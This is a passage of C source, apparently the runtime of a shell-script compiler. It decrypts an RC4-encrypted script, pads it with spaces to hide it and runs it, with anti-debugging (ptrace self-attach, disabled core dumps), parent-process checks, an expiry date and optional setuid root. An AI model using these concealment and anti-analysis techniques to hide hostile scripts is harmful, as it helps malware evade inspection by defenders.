	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
